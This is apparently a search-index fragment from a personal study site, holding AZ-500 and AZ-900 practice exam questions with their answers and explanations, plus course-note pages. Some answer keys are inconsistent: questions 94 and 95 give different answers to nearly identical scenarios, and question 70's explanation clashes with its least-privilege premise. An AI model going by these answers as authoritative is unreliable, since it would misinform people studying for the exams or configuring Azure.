        Adding an Azure AD administrator and assigning your account the SQL Security Manager built-in role are prerequisites for enabling Azure AD-only authentication. Selecting Support only Azure AD authentication for this server enforces the Azure SQL logical server to use Azure AD authentication. A connection to the data plane of the logical server is not needed.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-69","title":"Question 69","text":"

        You manage Azure AD for a retail company. You need to ensure that employees using shared Android tablets can use passwordless authentication when accessing the Azure portal. Which authentication method should you use? Select only one answer.

        • the Microsoft Authenticator app
        • security keys
        • Windows Hello
        • Windows Hello for Business
        See response

        You can only use the Microsoft Authenticator app or one-time password login on shared devices. Windows Hello can only be used for Windows devices. You cannot use security keys on shared devices.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-70","title":"Question 70","text":"

        You need to configure passwordless authentication. The solution must follow the principle of least privilege. Which role should assign to complete the task? Select only one answer.

        • Authentication Administrator
        • Authentication Policy Administrator
        • Global Administrator
        • Security Administrator
        See response

        Configuring authentication methods requires Global Administrator privileges. Security administrators have permissions to manage other security-related features. Authentication policy administrators can configure the authentication methods policy, tenant-wide multi-factor authentication (MFA) settings, and password protection policy. Authentication administrators can set or reset any authentication methods, including passwords, for non-administrators and some roles.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-71","title":"Question 71","text":"

        You manage Azure AD. You disable the Users can register applications option in Azure AD. A user reports that they are unable to register an application. You need to ensure that that the user can register applications. The solution must follow the principle of least privilege. What should you do? Select only one answer.

        • Assign the Application Developer role to the user.
        • Assign the Authentication Administrator role to the user.
        • Assign the Cloud App Security Administrator role to the user.
        • Enable the Users can register applications option.
        See response

        The Application Developer role has permissions to register an application even if the Users can register applications option is disabled. The Users can register applications option allows any user to register an application. The Authentication Administrator role and the Cloud App Security Administrator role do not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-72","title":"Question 72","text":"

        You have a virtual network that contains an Azure Kubernetes Service (AKS) workload and an internal load balancer. Multiple virtual networks are managed by multiple teams. You are unable to change any of the IP addresses. You need to ensure that clients from virtual networks in your Azure subscription can access the AKS cluster by using the internal load balancer. What should you do? Select only one answer.

        • Create a private link endpoint on the virtual network and instruct users to access the cluster by using a private link endpoint on their virtual network.
        • Create a private link service on the virtual network and instruct users to access the cluster by using a private link endpoint in their virtual networks.
        • Create virtual network peering between the virtual networks to allow connectivity.
        • Create VPN site-to-site (S2S) connections between the virtual networks to allow connectivity.
        See response

        A private link service will allow access from outside the virtual network to an endpoint by using NAT. Since you do not control the IP addressing for other virtual networks, this ensures connectivity even if IP addresses overlap. Once a private link service is used in the load balancer, other users can create a private endpoint on virtual networks to access the load balancer.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-73","title":"Question 73","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 runs a web app named App1. You need to protect App1 by implementing Web Application Firewall (WAF). What resource should you deploy? Select only one answer.

        • Azure Application Gateway
        • Azure Firewall
        • Azure Front Door
        • Azure Traffic Manager
        See response

        WAF is a tier of Application Gateway. If you want to deploy WAF, you must deploy Application Gateway and select the WAF or WAF V2 tier.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-74","title":"Question 74","text":"

        You have an Azure AD tenant that uses the default setting. You need to prevent users from a domain named contoso.com from being invited to the tenant. What should you do? Select only one answer.

        • Deploy Azure AD Privileged Identity Management (PIM).
        • Edit the Access review settings.
        • Edit the Collaboration restrictions settings.
        • Enable security defaults.
        See response

        After you edit the Collaboration restrictions settings, if you try to invite a user from a blocked domain, you cannot. Security defaults and PIM do not affect guest invitation privileges. By default, the Allow invitations to be sent to any domain (most inclusive) setting is enabled. In this case, you can invite B2B users from any organization.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-75","title":"Question 75","text":"

        Your company has an Azure Active Directory (Azure AD) tenant named whizlab.com. The company wants to deploy a service named \u201cGetcloudskillsserver\u201d that would run on a virtual machine running Windows Server 2016. The service needs to authenticate to the tenant and access Microsoft Graph to read the directory data. You need to delegate the minimum required permissions for the service. Which of the following steps would you perform in Azure? Choose 3 answers from the options below.

        • Add an app registration.
        • Grant Application Permissions.
        • Add application permission.
        • Configure an Azure AD Application Proxy.
        • Add delegated permission.
        See response

        Add an app registration. (Correct) Grant Application Permissions. (Correct) Add application permission. (Correct) Configure an Azure AD Application Proxy. (Incorrect) Add delegated permission. (Incorrect) First, you need to add an application registration. When it comes to the types of permissions, you have to use Application permissions for services. And then, finally, you grant the required permissions.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-76","title":"Question 76","text":"

        In order to get diagnostics from an Azure virtual machine you own, what is the first step to doing that?

        • A diagnostics agent needs to be installed on the VM
        • You need to create a storage account to store it
        • You need to grant RBAC\u00a0permissions to the user requesting diagnostics
        See response

        You need to create a storage account to store it

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-77","title":"Question 77","text":"

        Being the network engineer at your company, you need to ensure that communications with Azure Storage pass through the Service Endpoint. How would you ensure it?

        • By adding an Inbound rule to allow access to the storage
        • By adding one Inbound rule and one Outbound rule
        • By adding an Outbound rule to allow access to the storage
        • You don't need to make a specific configuration or add any rule, it is automatically configured.
        See response

        By adding an Outbound rule to allow access to the storage. Inbound/outbound network security group rules can be created to deny traffic from/to the Internet and allow traffic from/to AzureCloud or other available service tags of particular Azure services.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-78","title":"Question 78","text":"

        You need to recommend a solution for encrypting data at rest and in transit for your company's database. Which of the following would you recommend?

        • Azure storage encryption
        • Transparent Data Encryption
        • Always Encrypted
        • SSL certificates
        See response

        Always Encrypted.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-79","title":"Question 79","text":"

        A company wants to synchronize its on-premises Active Directory with its Azure AD tenant. They want to set up a solution that would minimize the need for additional hardware deployment. They also want to ensure that they can keep their current login restrictions. It includes logon hours for their current Active Directory users. Which authentication method should they implement?

        • Azure AD Connect and Pass-through authentication
        • Federated identity using Azure Directory Federation Services
        • Azure AD Connect and Password hash synchronization
        • Azure AD Connect and Federated authentication
        See response

        Azure AD Connect and Pass-through authentication. Since we need to minimize additional hardware deployments, we can use Azure AD Connect to synchronize Active Directory users with Azure AD.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-80","title":"Question 80","text":"

        You must specify whether the following statement is TRUE or FALSE: You are an administrator at getcloudskills.com and responsible for managing user accounts on Azure Active Directory. In order to leverage Azure administrative units, do you need an Azure Active Directory Premium License for each Administrative Unit member?

        • True
        • False
        See response

        False. To manage/use administrative units you need an Azure Active Directory premium license only for each Administrative Unit admin and you can use a free license for unit members.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-81","title":"Question 81","text":"

        A development team has published an application onto an Azure Web App service. They want to enable Azure AD authentication for the web application. They have to perform an application registration in Azure AD. Which of the following are required when you configure the App service for Azure AD authentication? Choose two answers from the options given below.

        • Client ID
        • Logout URL
        • Subscription ID
        • Tenant ID
        See response

        Client ID and Tenant ID

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-82","title":"Question 82","text":"

        You decide to use Azure Front Door for defining, managing, and monitoring the global routing for your web traffic and optimizing end-user reliability and performance via quick global failover. From the below-given list, choose the features that is not supported by Azure Front Door.

        • Redirect HTTPS traffic to HTTP using URL redirect
        • Web Application Firewall
        • URL path-based routing
        See response

        Redirect HTTPS traffic to HTTP using URL redirect

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-83","title":"Question 83","text":"

        If no rules other than the default NSG rules are in place, are VMs on SubnetA and SubnetB be able to connect to the Internet?

        • Yes
        • No
        See response

        Yes. The Outbound rules contain a Rule with the name \u201cAllowInternetOutBound\u201d. This would allow all Outbound traffic to the Internet.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-84","title":"Question 84","text":"

        Your company has a set of Azure SQL databases hosted on a logical server. They want to enable SQL auditing for the database. Which of the following can be used to store the audit logs? Choose 3 answers from the options given below.

        • Azure Log Analytics
        • Azure SQL database
        • Azure Event Hubs
        • Azure Storage accounts
        • Azure SQL data warehouse
        See response

        Azure Log Analytics, Azure Event Hubs and Azure Storage accounts

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-85","title":"Question 85","text":"

        Your organization is looking to increase its security posture. Which of the following would you implement to reduce the reliance on passwords and increase account security?

        • Entra ID B2C
        • Multi-factor Authentication (MFA)
        • Passwordless Authentication
        • Entra ID Directory Roles
        See response

        Multi-factor Authentication (MFA) and Passwordless Authentication. Multi-factor Authentication (MFA) enhances security by requiring two or more verification methods. Passwordless authentication allows users to sign in without a password, instead using methods like the Microsoft Authenticator app.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-86","title":"Question 86","text":"

        Which of the following is designed to ban certain passwords from being used, ensuring users avoid easily guessable and vulnerable passwords?

        • Entra ID Identity Protection
        • Entra ID Password Protection
        • Entra ID MFA
        • Entra ID B2B
        See response

        Entra ID Password Protection. Entra ID Password Protection helps you establish comprehensive defense against weak passwords in your environment. It bans certain passwords and sets lockout settings to prevent malicious attempts.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-87","title":"Question 87","text":"

        You're setting up an application to use Microsoft Entra ID for authentication. Which of the following are essential components you would need to create or configure in Microsoft Entra ID?

        • Application Registration
        • OAuth token grant
        • Azure Policy
        See response

        Application Registration and OAuth token grant. When you register an app with Microsoft Entra ID, you're creating an identity configuration for the app that allows it to integrate with the Entra ID identity service. A service principal is an identity created for use with applications, hosted services, and automated tools to access Azure resources.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-88","title":"Question 88","text":"

        You need to restrict access to your Azure Storage account such that it can only be accessed from a specific subnet within your Azure Virtual Network. Which feature should you utilize?

        • Private Link services
        • Virtual Network Service Endpoints
        • Azure Functions
        • Azure SQL Managed Instance
        See response

        Virtual Network Service Endpoints. Virtual Network Service Endpoints extend your virtual network private address space and the identity of your VNet to the Azure services, over a direct connection. Endpoints allow you to secure your critical Azure service resources to only your virtual networks.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-89","title":"Question 89","text":"

        Which of the following Azure services offer built-in Distributed Denial of Service (DDoS) protection to secure your applications?

        • Azure Firewall
        • Azure Application Gateway
        • Azure DDoS Protection Standard
        • Azure Front Door
        See response

        Azure Application Gateway, Azure DDoS Protection Standard and Azure Front Door. Azure Application Gateway offers DDoS protection as part of its WAF (Web Application Firewall) feature. c. Azure DDoS Protection Standard provides advanced DDoS mitigation capabilities. Azure Front Door provides both DDoS protection and Web Application Firewall for its global HTTP/HTTPS endpoints.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-90","title":"Question 90","text":"

        You have been assigned to enhance the security and compliance of your organization's Azure SQL Database. Which of the following measures can you adopt to encrypt data and audit database operations?

        • Transparent Database Encryption (TDE)
        • Azure SQL Database Always Encrypted
        • Azure Blob Soft Delete
        • Enable database auditing
        See response

        Transparent Database Encryption (TDE) and Enable database auditing. Transparent Database Encryption (TDE) encrypts SQL Server, Azure SQL Database, and Azure Synapse Analytics data files. Database auditing tracks database events and writes them to an audit log in your Azure storage account.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-91","title":"Question 91","text":"

        You need to centralize the management of security configurations for multiple Azure subscriptions. Which Azure service should you utilize to ensure consistent application of configurations?

        • Entra ID
        • Azure Key Vault
        • Azure Blueprint
        • Azure Landing Zone
        See response

        Azure Blueprint. Azure Blueprint enables organizations to define a repeatable set of Azure resources that adheres to specific requirements and standards. It allows consistent application of configurations across multiple subscriptions.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-92","title":"Question 92","text":"

        You are an Azure security specialist who has been tasked with setting up and maintaining the security monitoring within the organization. Which of the following tasks can be accomplished with Microsoft Sentinel?

        • Monitor security events using Azure Monitor Logs
        • Automate response to specific security threats
        • Customize analytics rules to identify potential threats
        • Deploy virtual machines in Azure
        • Evaluate and manage generated alerts
        See response

        Monitor security events using Azure Monitor Logs, Automate response to specific security threats, Customize analytics rules to identify potential threats and Evaluate and manage generated alerts. a. Microsoft Sentinel uses Azure Monitor Logs for security events, enabling users to monitor these events. b. Microsoft Sentinel offers automation features to respond to detected security threats. c. One of the features of Microsoft Sentinel is the ability to customize analytics rules, helping in the detection of potential threats. d. Deploying virtual machines is a task within Azure and isn't specifically a function of Microsoft Sentinel. e. Microsoft Sentinel generates alerts based on its analytics, and users can evaluate and manage these alerts within the platform.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-93","title":"Question 93","text":"

        You have a hybrid configuration of Azure Active Directory (Azure AD). You have an Azure HDInsight cluster on a virtual network. You plan to allow users to authenticate to the cluster by using their on-premises Active Directory credentials. You need to configure the environment to support the planned authentication. Solution: You deploy the On-premises data gateway to the on-premises network. Does this meet the goal?

        • Yes
        • No
        See response

        No.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-94","title":"Question 94","text":"

        Your company has an Azure subscription name Subscription1 that contains the users shown in the following table:

        Name Role User1 Global Administrator User2 Billing Administrator User3 Owner User4 Account Admin

        The company is sold to a new owner. The company needs to transfer ownership of Suscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        Select user:

        • User1
        • User2
        • User3
        • User4

        Select tool:

        • Azure Account Center
        • Azure Cloud Shell
        • Azure PowerShell
        • Azure Security Center
        See response

        User2. Azure Account Center.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-95","title":"Question 95","text":"

        Your company has an Azure subscription name Subscription1. Subscription1 is associated with the Azure Active Directory tenant that includes the users shown in the following table:

        Name Role User1 Global Administrator User2 Billing Administrator User3 Owner User4 Account Admin

        The company is sold to a new owner. The company needs to transfer ownership of Suscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        Select user:

        • User1
        • User2
        • User3
        • User4

        Select tool:

        • Azure Account Center
        • Azure Cloud Shell
        • Azure PowerShell
        • Azure Security Center
        See response

        User1. Azure Account Center.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-96","title":"Question 96","text":"

        The CIS Microsoft Azure Foundations Security Benchmark provides several recommended best practices related to identify and access management. Each of the following is a best practice except for this one?

        • Avoid unnecessary guest user accounts in Azure Active Directory.
        • Enable Azure Multi-Factor Authentication (MFAA).
        • Establish intervals for reviewing user authentication methods.
        • Enable Self-Service Group Management.
        See response

        Enable Self-Service Group Management.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-97","title":"Question 97","text":"

        You have an Azure Active Directory (Azure AD) tenant that contains the users shown in the following table.

        Name Member of a group Multi-factor authentication (MFA) status User1 Group1, Group2 Enabled User2 Group1 Disabled

        You create and enforce an Azure AD Identity Protection sign-in risk policy that has the following settings:

        • Assignments: Include Group 1, exclude Group2
        • Conditions: Sign-in risk level: Low and above
        • Access: Allow access, Require multi-factor authentication.

        You need to identify what occurs when the users sign in to Azure AD. What should you identify for each user? To answer, select the apropriate options in the answer area. NOTE: Each correct selection is worth one point.

        When User1 signs in from an anonymous IP address, the user will:

        • Be blocked.
        • Be prompted for MFA.
        • Sign in by using a username and password only.

        When User2 signs in from an unfamiliar location, the user will:

        • Be blocked.
        • Be prompted for MFA.
        • Sign in by using a username and password only.
        See response

        User1 will be prompted for MFA. User2 will be blocked

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-98","title":"Question 98","text":"

        You have an Azure subscription that contains the virtual machines shown in the following table

        Name Location Virtual network name VM1 East US VNet1 VM2 West US VNet2 VM3 East US VNet1 VM4 West US VNet3

        All the virtual networks are peered. You deploy Azure Bastion to VNet2. Which virtual machines can be protected by the bastion host?

        • VM1, VM2, VM3, and VM4.
        • VM1, VM2, and VM3 only.
        • VM2 and VM4 only.
        • VM2 only.
        See response

        VM1, VM2, VM3, and VM4.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-99","title":"Question 99","text":"

        You have an Azure subscription that contains the Azure virtual machines shown in the following table

        Name Operating System VM1 Windows 10 VM2 Windows Server 2016 VM3 Windows Server 2019 VM4 Ubuntu Server 18.04 LTS

        You create an MDM Security Baseline profile named Profile1. You need to identify to which virtual machines Profile1 can be applied. Which virtual machines should you identify?

        • VM1, VM2, VM3, and VM4.
        • VM1, VM2, and VM3 only.
        • VM1 and VM3 only.
        • VM1 only.
        See response

        VM1 only.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-100","title":"Question 100","text":"

        You have an Azure subscription named Sub1. You create a virtual network that contains one subnet. On the subnet, you provision the virtual machines shown in the following table.

        Name Network Interface Application security group assignment IP address VM1 NIC1 Appgroup12 10.0.0.10 VM2 NIC2 Appgroup12 10.0.0.11 VM3 NIC3 Appgroup3 10.0.0.100 VM4 NIC4 Appgroup4 10.0.0.200

        Currently, you have not provisioned any network security group (NSGs). You need to implement network security to meet the following requirements:

        • Allow traffic to VM4 from VM3 only.
        • Allow traffic from the Internet to VM1 and VM2.
        • Minimize the number of NSGs and network security rules.

        How many NSGs and network security rules should you create? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        NSGs:

        • 1
        • 2
        • 3
        • 4

        **Network security rules: **

        • 1
        • 2
        • 3
        • 4
        See response

        NSGs: 2. Network security rules: 3.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-keep-learning/","title":"AZ-500 Microsoft Azure Security Technologies Certificate - keep learning","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-keep-learning/#az-500-microsoft-azure-security-technologies-certificate-keep-learning","title":"AZ-500 Microsoft Azure Security Technologies Certificate: keep learning","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        In addition to completing the course work in the AZ-500 learning path, you should also be sure to read the following reference articles from Microsoft:

        • Manage Azure Active Directory groups and group membership
        • Configure Microsoft Entra Verified ID verifier
        • Block legacy authentication with Azure AD with Conditional Access
        • Microsoft Entra Permissions Management
        • What are access reviews?
        • Register an app with Azure Active Directory
        • Application and service principal objects in Azure Active Directory
        • Virtual network traffic routing
        • Azure SQL Database and Azure Synapse IP firewall rules
        • Networking considerations for App Service Environment
        • Create a virtual network for Azure SQL Managed Instance
        • Add and manage TLS/SSL certificates in Azure App Service
        • Observability in Azure Container Apps
        • Choose how to authorize access to blob data in the Azure portal
        • Authorize access to tables using Azure Active Directory
        • Choose how to authorize access to queue data in the Azure portal
        • Configure immutability policies for blob versions
        • Bring your own key details for Azure Information Protection
        • Enable infrastructure encryption for double encryption of data
        • Define and assign a blueprint in the portal
        • What is an Azure landing zone?
        • Dedicated HSM FAQ
        • Improve your regulatory compliance
        • Customize the set of standards in your regulatory compliance dashboard
        • Create custom Azure security initiatives and policies
        • Plan your Defender for Servers deployment
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/","title":"AZ-500 Azure Security Engineer: Notes on the certification","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        These are some of the requirements for facing the az-500 highlighted by some experts:

        • Have previously taken the Azure Administrator: AZ-103/104 course.
        • A minimum of 1 year experience with Azure.
        • Understand concepts of virtual machines, resource groups and Azure AD.

        Since I only had two vouchers for azure certifications in 2023 and I had already spent one on the AZ-900, and I focused myself on the AZ-500, but first I completed the AZ-104 trainings. These are my notes for this AZ-104 not-certificated learning.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/#differences-between-the-az-500-and-the-sc-900-certification","title":"Differences between the AZ-500 and the SC-900 certification","text":"

        The Exam AZ-500: Microsoft Azure Security Technologies is focused on Azure Security Engineer implements, manages, and monitors security for resources in Azure, multi-cloud, and hybrid environments as part of an end-to-end infrastructure. This Certification contains security components and configurations to protect identity & access, data, applications, and networks.

        Regarding the Exam SC-900: Microsoft Security, Compliance, and Identity Fundamentals is targeted to those looking to familiarize themselves with the fundamentals of security, compliance, and identity (SCI) across cloud-based and related Microsoft services. This is a broad audience that may include business stakeholders, new or existing IT professionals, or students who have an interest in Microsoft security, compliance, and identity solutions.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-900-exams/","title":"Exams - Practice the AZ-900","text":"

        The AZ-900: Notes to get through the Azure Fundamentals Certificate and these Practice exams are derived from different sources.

        • Notes taken in: September 2023.
        • Certification accomplish at: September 23th, 2023.
        • Practice tests: Practice tests from different sources.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#microsoft-platform","title":"Microsoft platform","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#practice-assessment-1","title":"Practice assessment 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-of-50","title":"Question 1 of 50","text":"

        Why is cloud computing often less expensive than on-premises datacenters? Each correct answer presents a complete solution.

        • You are only billed for what you use.

        Renting compute and storage services and being billed for only what you use often lowers operating expenses. Depending on the service and the type of network bandwidth, charges can be incurred. Cloud service offerings often provide functionality that can be difficult or cost-prohibitive to deploy on-premises, especially for smaller organizations. Major cloud providers offer services around the world. Making it easy and relatively inexpensive to deploy services close to where your users reside. Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-of-50","title":"Question 2 of 50","text":"

        Select the answer that correctly completes the sentence. (------Your Answer Here -------)\u00a0refers to upfront costs incurred one time, such as hardware purchases.

        • Capital expenditures

        Capital expenditures are one-time expenses that can be deducted over time. Operational expenditures are billed as you use services and a do not have upfront costs.

        Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-of-50","title":"Question 3 of 50","text":"

        Which cloud deployment model are you using if you have servers physically located at your organization\u2019s on-site datacenter, and you migrate a few of the servers to the cloud?

        • hybrid cloud

        A hybrid cloud is a computing environment that combines a public cloud and a private cloud by allowing data and applications to be shared between them.

        Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-of-50","title":"Question 4 of 50","text":"

        Select the answer that correctly completes the sentence.

        Increasing compute capacity for an app by adding RAM or CPUs to a virtual machine is called\u00a0(------Your Answer Here -------).

        • vertical scaling

        You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. Disaster recovery keeps data and other assets safe in the event of a disaster. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-of-50","title":"Question 5 of 50","text":"

        Select the answer that correctly completes the sentence.

        Deploying and configuring cloud-based resources quickly as business requirements change is called\u00a0(------Your Answer Here -------).

        • agility

        Agility means that you can deploy and configure cloud-based resources quickly as app requirements change. Scalability means that you can add RAM, CPU, or entire virtual machines to a configuration. Elasticity means that you can configure cloud-based apps to take advantage of autoscaling, so apps always have the resources they need. High availability means that cloud-based apps can provide a continuous user experience with no apparent downtime, even when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-of-50","title":"Question 6 of 50","text":"

        What are cloud-based backup services, data replication, and geo-distribution features of?

        • a disaster recovery plan

        Disaster recovery uses services, such as cloud-based backup, data replication, and geo-distribution, to keep data and code safe in the event of a disaster. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-of-50","title":"Question 7 of 50","text":"

        What is high availability in a public cloud environment dependent on?

        • the service-level agreement (SLA) that you choose

        Different services have different SLAs. Sometimes different tiers of the same service will offer different SLAs, which can increase or decrease the promised availability. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-of-50","title":"Question 8 of 50","text":"

        Select the answer that correctly completes the sentence.

        An example of\u00a0(------Your Answer Here -------)\u00a0is automatically scaling an application to ensure that the application has the resources needed to meet customer demands.

        • elasticity

        Elasticity refers to the ability to scale resources as needed, such as during business hours, to ensure that an application can keep up with demand, and then reducing the available resources during off-peak hours. Agility refers to the ability to deploy new applications and services quickly. High availability refers to the ability to ensure that a service or application remains available in the event of a failure. Geo-distribution makes a service or application available in multiple geographic locations that are typically close to your users. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-of-50","title":"Question 9 of 50","text":"

        Select the answer that correctly completes the sentence.

        Increasing the capacity of an application by adding additional virtual machine is called\u00a0(------Your Answer Here -------).

        • horizontal scaling

        Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Agility refers to the ability to deploy new applications and services quickly. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-of-50","title":"Question 10 of 50","text":"

        In a platform as a service (PaaS) model, which two components are the responsibility of the cloud service provider? Each correct answer presents a complete solution.

        • operating system
        • physical network

        In PaaS, the cloud provider is responsible for the operating system, physical datacenter, physical hosts, and physical network. In PaaS, the customer is responsible for accounts and identities. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-of-50","title":"Question 11 of 50","text":"

        Which type of cloud service model is typically licensed through a monthly or annual subscription?

        • software as a service (SaaS)

        SaaS is software that is centrally hosted and managed for you and your users or customers. Usually, one version of the application is used for all customers, and it is licensed through a monthly or annual subscription. PaaS and IaaS use a consumption-based model, so you only pay for what you use. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-of-50","title":"Question 12 of 50","text":"

        In which cloud service model is the customer responsible for managing the operating system?

        • Infrastructure as a service (IaaS)

        IaaS consists of virtual machines and networking provided by the cloud provider. The customer is responsible for the OS and applications. The cloud provider is responsible for the OS in PaaS and SaaS. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-of-50","title":"Question 13 of 50","text":"

        What is the customer responsible for in a software as a service (SaaS) model?

        • data and access

        SaaS allows you to pay to use an existing application on hardware managed by a third party. You supply data and configure access. Customers are only responsible for storage in a private cloud. Customers are responsible for virtual machines and runtime in IaaS and the private cloud. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-of-50","title":"Question 14 of 50","text":"

        What uses the infrastructure as a service (IaaS) cloud service model?

        • Azure virtual machines

        Azure Virtual Machines is an IaaS offering. The customer is responsible for the configuration of the virtual machine as well as all operating system configurations. Azure App Services and Azure Cosmos DB are PaaS offerings. Microsoft Office 365 is a SaaS offering. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-of-50","title":"Question 15 of 50","text":"

        Select the answer that correctly completes the sentence.

        (------Your Answer Here -------)\u00a0is the logical container used to combine and organize Azure resources.

